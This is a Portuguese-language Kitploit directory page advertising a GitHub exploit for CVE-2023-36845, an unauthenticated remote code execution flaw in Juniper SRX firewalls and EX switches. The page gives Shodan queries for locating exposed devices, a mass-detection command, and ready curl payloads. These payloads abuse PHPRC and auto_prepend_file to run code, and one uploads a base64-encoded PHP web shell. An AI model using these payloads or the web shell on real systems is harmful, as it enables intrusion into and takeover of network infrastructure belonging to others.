Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleDesenvolvimento de Payloads
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

Exploit para CVE-2023-36845 que permite execução remota de código não autenticada em firewalls Juniper SRX e switches EX por meio de manipulação de variáveis de ambiente PHP, com capacidades de detecção e entrega de payload.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Juniper-exploit-CVE-2023-36845 — Exploit para CVE-2023-36845 que permite execução remota de código não autenticada em firewalls Juniper SRX e switches EX por meio de manipulação de variáveis de ambiente PHP, com capacidades de detecção e entrega de payload. | Kitploit
Ver Repositório
há 2 anosAinda não revisado

CVE-2023-36845

Descrição

CVE-2023-36845 representa uma notável vulnerabilidade de manipulação de variáveis de ambiente PHP que afeta firewalls Juniper SRX e switches EX. Embora a Juniper tenha classificado esta vulnerabilidade como de gravidade média, neste artigo, vamos elucidar como esta única vulnerabilidade pode ser aproveitada para execução remota de código não autenticada.

Pesquisa - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
image
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
image

Uso 🛠

Detecção

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

Opção 1

É viável utilizar qualquer wrapper de protocolo em conjunto com auto_prepend_file. A escolha mais adequada para esta operação é o protocolo data://, que permite fornecer o "arquivo secundário" inline. Aqui está uma representação sofisticada deste exploit, executando o <? phpinfo(); ?> embutido no esquema data://:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

Execute o comando whoami

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

Opção 2

Carregar um arquivo

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

Parâmetros 🧰

ParâmetroDescriçãoTipo
--file / -fArquivo de alvos de entradaArquivo
-oArquivo de saídaArquivo
Baixar ferramenta